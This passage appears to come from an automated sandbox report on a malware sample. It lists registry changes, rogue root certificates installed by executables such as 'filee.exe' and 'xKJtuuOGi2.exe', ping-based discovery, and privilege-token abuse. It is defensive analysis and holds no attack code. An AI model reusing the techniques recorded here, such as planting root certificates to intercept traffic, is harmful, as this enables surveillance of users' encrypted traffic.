Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "326093528"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "28"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}\1 = "2256"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify.	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3e08fbc52239d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{8C8CE9A4-7737-49AB-B841-3790C89A227C}"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4290cca42239d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\BlameModules	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 808d2fb92239d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	filee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	filee.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	xKJtuuOGi2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	xKJtuuOGi2.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5476	PING.EXE
6104	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2824	rundll32.exe
2824	rundll32.exe
500	svchost.exe
500	svchost.exe
3940	ultramediaburner.tmp
3940	ultramediaburner.tmp
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe
1776	Tevaesurama.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2756	Process not Found

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
4604	MicrosoftEdgeCP.exe
4604	MicrosoftEdgeCP.exe
1172	toolspab1.exe
4796	c7ae36fa.exe
2556	MicrosoftEdgeCP.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
4876	explorer.exe
4876	explorer.exe
4876	explorer.exe
4876	explorer.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2716	explorer.exe
2716	explorer.exe
2716	explorer.exe
2716	explorer.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
5928	explorer.exe
5928	explorer.exe
5928	explorer.exe
5928	explorer.exe
2756	Process not Found
2756	Process not Found
5928	explorer.exe
5928	explorer.exe
4876	explorer.exe
4876	explorer.exe
2716	explorer.exe
2716	explorer.exe
5928	explorer.exe
5928	explorer.exe
4876	explorer.exe
4876	explorer.exe
2716	explorer.exe
2716	explorer.exe
5744	dsdtsbw
3512	tvdtsbw
5820	dsdtsbw
2288	tvdtsbw
4876	explorer.exe
4876	explorer.exe
2556	MicrosoftEdgeCP.exe
2556	MicrosoftEdgeCP.exe
2716	explorer.exe
2716	explorer.exe
5928	explorer.exe
5928	explorer.exe
4876	explorer.exe
4876	explorer.exe
5928	explorer.exe
5928	explorer.exe
2716	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeTcbPrivilege	500	svchost.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	3532	JoSetp.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	2824	rundll32.exe
Token: SeDebugPrivilege	1468	Ultra.exe
Token: SeAuditPrivilege	2468	svchost.exe
Token: SeDebugPrivilege	2720	Xobaepojedu.exe
Token: SeDebugPrivilege	1776	Tevaesurama.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
